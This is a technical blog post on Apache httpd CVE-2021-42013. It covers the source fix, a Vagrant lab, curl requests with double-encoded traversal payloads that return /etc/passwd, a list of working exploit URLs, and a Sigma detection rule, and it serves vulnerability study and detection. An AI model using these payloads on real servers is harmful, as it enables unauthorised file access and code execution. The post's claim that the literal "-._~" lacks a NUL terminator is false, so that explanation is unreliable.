Technical analysis and detection of Apache HTTPD CVE-2021-42013

Introduction

A novel directory traversal bug was introduced in apache httpd-2.4.49 in late September and quickly followed by an incomplete fix on version httpd-2.4.50 that was also followed by a fix on version httpd-2.4.51. We have a previous post describing the vulnerable code in httpd-2.4.49 and the implemented fix from httpd-2.4.50. In this post, we will discuss the code changes that led to introducing a new bug assigned CVE-2021-42013 that leads to Path Traversal and Remote Code Execution in httpd-2.4.50 as well as the fix and detection techniques.

In the previous post, we learned about apache httpd-2.4.49 and CVE-2021-41773, a fix has been published, and httpd-2.4.50 was released. However, the fix was incomplete and led to a directory traversal and command execution bug.

To approach this fix, we will look at the source code changes to understand what changed then we will be using basic fuzzing techniques to reproduce the security bug in a test environment.

Technical details

A good starting point would be to look at the apache vulnerability page, which mention

If files outside of these directories are not protected by the usual default configuration
"require all denied", these requests can succeed. If CGI scripts are also
enabled for these aliased pathes, this could allow for remote code execution.

So to be able to fuzz and reproduce the bug, we need to

  1. Compile httpd-2.4.50 with CGI support
  2. change the configuration for document root from (insecure config)
<Directory />
    AllowOverride none
    Require all  denied
<Directory />

to

 <Directory />
  AllowOverride none
  Require all  granted
 <Directory />

but first, let us take a look at the code changes between Vulnerable httpd-2.4.50 code revision 1893775, and current httpd-2.4.51 revision r1893977

from the commit message, we see

Merge r1893971 from trunk:

core: Add ap_unescape_url_ex() for better decoding control, and deprecate
      unused AP_NORMALIZE_DROP_PARAMETERS flag.

We see from code diff that the function ap_normalize_path() fixed an issue to include double encoded chars and decode to their corresponding unreserved characters and fails if invalid encoding detected, the old function from r1893775 was using a different macro along with standard C library function hence the fix was incomplete.

To illustrate more, let us take the following URL as an example

http://127.0.0.1/cgi-bin/%2e%2e/etc/passwd

The old function r1893775 checks the first 3 characters in URI path after '/', if it starts with '%'; and the following two digits like (e, 2 in this case)

%2e or %20 or %65

Characters after '%' in this case '2', 'e' or '0' are checked to ensure they are Unreserved characters (the unreserved chars consists of small/capital letters, digits, '-' '.' '_' '~' )

The check is done using a macro apr_isalnum() as well as a standard C function strchr().

code

1 --- httpd/httpd/branches/2.4.x/server/util.c    2021/10/07 12:24:49    1893976
2 +++ httpd/httpd/branches/2.4.x/server/util.c    2021/10/07 12:27:43    1893977
3 @@ -530,23 +530,20 @@ AP_DECLARE(int) ap_normalize_path(char *
4           *  be decoded to their corresponding unreserved characters by
5           *  URI normalizers.
6           */
7 -        if (decode_unreserved
8 -                && path[l] == '%' && apr_isxdigit(path[l + 1])
9 -                                  && apr_isxdigit(path[l + 2])) {
10 -            const char c = x2c(&path[l + 1]);
11 -            if (apr_isalnum(c) || (c && strchr("-._~", c))) {
12 -                /* Replace last char and fall through as the current
13 -                 * read position */
14 -                l += 2;
15 -                path[l] = c;
...

The function strchr() searches for a specific character in a string ("-._~" in this case). If strchr() finds the character, it returns a pointer to it. Otherwise, it returns a NULL if the character is not found. Because there is no NUL character in this string "-._~" ,strchr() might go past the end of the buffer and locate the character it's searching for in another variable or possibly in the program's memory.

The new code r1893977 replaces the usage of the macro apr_isalnum() with a new macro TEST_CHAR()

TEST_CHAR(c, f)   (test_char_table[(unsigned char)(c)] & (f))

1 -                path[l] = c;
2 +        if (decode_unreserved && path[l] == '%') {
3 +            if (apr_isxdigit(path[l + 1]) && apr_isxdigit(path[l + 2])) {
4 +                const char c = x2c(&path[l + 1]);
5 +                if (TEST_CHAR(c, T_URI_UNRESERVED)) {
6 +                    /* Replace last char and fall through as the current
7 +                     * read position */
8 +                    l += 2;
9 +                    path[l] = c;

While adding flags here and there to deprecate the previous apr_isalnum and strchr().

However, unlike the old function, the new function has an else statement to include everything else that is strictly invalid encoding.

The new code r1893977 also included changes to the request.c file, which basically depreciate unused ap_normalize_drop_parameters flag and added a new function ap_unescape_url_ex().

Fuzzing and exploit development

After understanding the code, let us try to fuzz the vulnerable httpd-2.4.50. To do that, let us setup a testing environment using Vagrant. Vagrant is a tool by HashiCorp for building and managing virtual machine environments in a single workflow.

our Vagrantfile looks like

Vagrant.configure("2") do |config|  
    config.vm.box = "geerlingguy/ubuntu1604"
    config.vm.hostname = "httpd2450"
    config.vm.box_check_update = false
    config.vm.network "forwarded_port", guest: 80, host: 8080, host_ip: "127.0.0.1"
    config.vm.provider "virtualbox" do |vb|
      vb.name = "apache-2-4-50"
      vb.gui = false  
      vb.memory = "1024"
    end
    config.vm.provision "shell", path: "provision.sh"
  end

And an accompanying provisioning script to configure our vulnerable virtual machine.

#!/usr/bin/env bash
apt update
apt install -y libaprutil1-dev gcc libpcre3-dev make vim
wget http://archive.apache.org/dist/httpd/httpd-2.4.50.tar.bz2
bzip2 -d httpd-2.4.50.tar.bz2
tar xvf httpd-2.4.50.tar
cd httpd-2.4.50
./configure --enable-cgid
make
make install
chown -R daemon:daemon /usr/local/apache2/
sudo sed -i '0,/Require all denied/{s/Require all denied/Require all granted/}' /usr/local/apache2/conf/httpd.conf
sudo /usr/local/apache2/bin/apachectl start

Saving those two files inside a folder, make sure you have vagrant and VirtualBox installed on your system, then invoke vagrant as.

vagrant up

If everything goes well, we should have a virtual machine running and listening on port 8080. visiting localhost:8080 from our host, we should see it works message.

$ curl http://127.0.0.1:8080/
<html><body><h1>It works!</h1></body></html>

Now we need to fuzz the cgi-bin directory that we know has the vulnerable configuration. The directory traversal characters are '../' that takes us to the upper directory using POSIX-like shells. Sending the request from our previous post, we see it does not work.

$ curl -i http://127.0.0.1:80/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
HTTP/1.1 400 Bad Request
Date: Thu, 21 Oct 2021 08:11:44 GMT
Server: Apache/2.4.50 (Unix)
Content-Length: 226
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
</body></html>

But because the code from 1893977 specifically checks for '2', 'e' and 'E' after '%' between lines 11 through 15, which uses strchr().

1 --- httpd/httpd/branches/2.4.x/server/util.c    2021/10/07 12:24:49    1893976
2 +++ httpd/httpd/branches/2.4.x/server/util.c    2021/10/07 12:27:43    1893977
3 @@ -530,23 +530,20 @@ AP_DECLARE(int) ap_normalize_path(char *
4           *  be decoded to their corresponding unreserved characters by
5           *  URI normalizers.
6          */
7 -        if (decode_unreserved
8 -                && path[l] == '%' && apr_isxdigit(path[l + 1])
9 -                                  && apr_isxdigit(path[l + 2])) {
10 -            const char c = x2c(&path[l + 1]);
11 -            if (apr_isalnum(c) || (c && strchr("-._~", c))) {
12 -                /* Replace last char and fall through as the current
13 -                 * read position */
14 -                l += 2;
15 -                path[l] = c;
16 +        if (decode_unreserved && path[l] == '%') {
17 +            if (apr_isxdigit(path[l + 1]) && apr_isxdigit(path[l + 2])) {
18 +                const char c = x2c(&path[l + 1]);
19 +                if (TEST_CHAR(c, T_URI_UNRESERVED)) {
20 +                    /* Replace last char and fall through as the current
21 +                     * read position */
22 +                    l += 2;
23 +                    path[l] = c;
24 +                }
25 +            }
26 +            else {
27 +                /* Invalid encoding */
28 +                ret = 0;
29              }
30 -        }
32 -
33 -        if ((flags & AP_NORMALIZE_DROP_PARAMETERS) && path[l] == ';') {
34 -            do {
35 -                l++;
36 -            } while (!IS_SLASH_OR_NUL(path[l]));
37 -            continue;
38          }
39  
40          if (w == 0 || IS_SLASH(path[w - 1])) {
41 @@ -1889,8 +1886,12 @@ static char x2c(const char *what)
42   *   decoding %00 or a forbidden character returns HTTP_NOT_FOUND
43   */
44  
45 -static int unescape_url(char *url, const char *forbid, const char *reserved)
46 +static int unescape_url(char *url, const char *forbid, const char *reserved,
47 +                        unsigned int flags)
48  {
49 +    const int keep_slashes = (flags & AP_UNESCAPE_URL_KEEP_SLASHES) != 0,
50 +              forbid_slashes = (flags & AP_UNESCAPE_URL_FORBID_SLASHES) != 0,

keeping the following URL-encoding in mind

Char URL Encoding
. %2E
% %25
2 %32
e %65
E %45

and will try double encoding '%' character only and send a new request

curl -i http://127.0.0.1:80/cgi-bin/%252e%2e/%252e%2e/%252e%2e/%252e%2e/etc/passwd
HTTP/1.1 404 Not Found
Date: Sun, 24 Oct 2021 08:05:49 GMT
Server: Apache/2.4.50 (Unix)
Content-Length: 196
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN ">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>

That doesn't work because apr_isalnum() is not looking for it; lets try to encode '2' and send the request again.


curl -i http://127.0.0.1:80/cgi-bin/%%32e%2e/%%32e%%32e/%%32e%%32e/%%32e%%32e/etc/passwd
HTTP/1.1 200 OK
Date: Sun, 24 Oct 2021 08:09:26 GMT
Server: Apache/2.4.50 (Unix)
Last-Modified: Wed, 04 Nov 2020 18:21:18 GMT
ETag: "616-5b34c0bb322ad "
Accept-Ranges: bytes
Content-Length: 1558

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
...

Success! we have a working exploit; however, lets encode the 'e' and send the request again

curl -i http://127.0.0.1:80/cgi-bin/%2%65%2%65/%2%65%2%65/%2%65%2%65/%2%65%2%65/etc/passwd
HTTP/1.1 200 OK
Date: Sun, 24 Oct 2021 08:11:34 GMT
Server: Apache/2.4.50 (Unix)
Last-Modified: Wed, 04 Nov 2020 18:21:18 GMT
ETag: "616-5b34c0bb322ad "
Accept-Ranges: bytes
Content-Length: 1558

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
...

Another successful exploitation, we assume when encoding the 'E' we will have the same results.

curl -i http://127.0.0.1:80/cgi-bin/%2%45%2%45/%2%45%2%45/%2%45%2%45/%2%45%2%45/etc/passwd
HTTP/1.1 200 OK
Date: Sun, 24 Oct 2021 08:13:11 GMT
Server: Apache/2.4.50 (Unix)
Last-Modified: Wed, 04 Nov 2020 18:21:18 GMT
ETag: "616-5b34c0bb322ad "
Accept-Ranges: bytes
Content-Length: 1558

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...

Same results as expected. The full exploit requests would be a double encoding of URL characters, so all these should work.

curl -i http://127.0.0.1:80/cgi-bin/%2%65%2%65/%2%65%2%65/%2%65%2%65/%2%65%2%65/etc/passwd
curl -i http://127.0.0.1:80/cgi-bin/%%32e%2e/%%32e%%32e/%%32e%%32e/%%32e%%32e/etc/passwd
curl -i http://127.0.0.1:80/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
curl -i http://127.0.0.1:80/cgi-bin/%2%45%2%45/%2%45%2%45/%2%45%2%45/%2%45%2%45/etc/passwd
curl -i http://127.0.0.1:80/cgi-bin/.%%32e/.%%32e/.%%32e/.%%32e/etc/passwd
curl -i http://127.0.0.1:80/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
curl -i http://127.0.0.1:80/cgi-bin/.%2%65/.%2%65/.%2%65/.%2%65/etc/passwd
curl -i http://127.0.0.1:80/cgi-bin/%%32%65./%%32%65./%%32%65./%%32%65./etc/passwd

Alright! How do we detect this?

To Detect this attack from our logs, we can look at URL encoding in our logs alongside CGI enabled directories and HTTP success status like 200 or 301 found

Here is a sigma rule for detection


                title: CVE-2021-42013 Exploitation Attempt detected
                id: 7a34e2f7-85a7-4486-9747-e1a71b9a8f76
                status: experimental
                description: Detects directory traversal and code execution exploitation attempts in Apache httpd-2.4.50 CVE-2021-42013.
                author: Asim Jaweesh
                date: 2021/10/24
                references:
                    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013
                    - https://svn.apache.org/viewvc?view=revision&revision=1893977
                    - https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-41773.yaml
                    - https://github.com/pisut4152/Sigma-Rule-for-CVE-2021-41773-and-CVE-2021-42013-exploitation-attempt/blob/main/web_cve_2021_41773_and_cve_2021_42013_apache_path_traversal.yml
                logsource:
                  category: webserver
                detection:
                    selection:
                        c-uri|contains:
                            - '/cgi-bin/'
                            - '%2%65%2%65/%2%65%2%65/%2%65%2%65/%2%65%2%65'
                            - '%%32e%2e/%%32e%%32e/%%32e%%32e/%%32e%%32e'
                            - '%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65'
                            - '%2%45%2%45/%2%45%2%45/%2%45%2%45/%2%45%2%45'
                            - '.%%32e/.%%32e/.%%32e/.%%32e'
                            - '.%%32%65/.%%32%65/.%%32%65/.%%32%65'
                            - '.%2%65/.%2%65/.%2%65/.%2%65'
                            - '%%32%65./%%32%65./%%32%65./%%32%65.'
                    selection_success:
                        sc-status:
                            - 200
                            - 301   
                    condition: selection and selection_success
                false_positives:
                    - Unknown
                tags:
                    - attack.initial_access
                    - attack.t1190
                level: critical
                

Conclusion

To successfully exploit the CVE-2021-42013, we must double encode '2', 'e', or 'E' inside a CGI-enabled directory. The fix was a simple change to remove the previously used macro alongside the standard C library function and introduce a new macro. And we can use the sigma rules for detection across different SIEM solutions.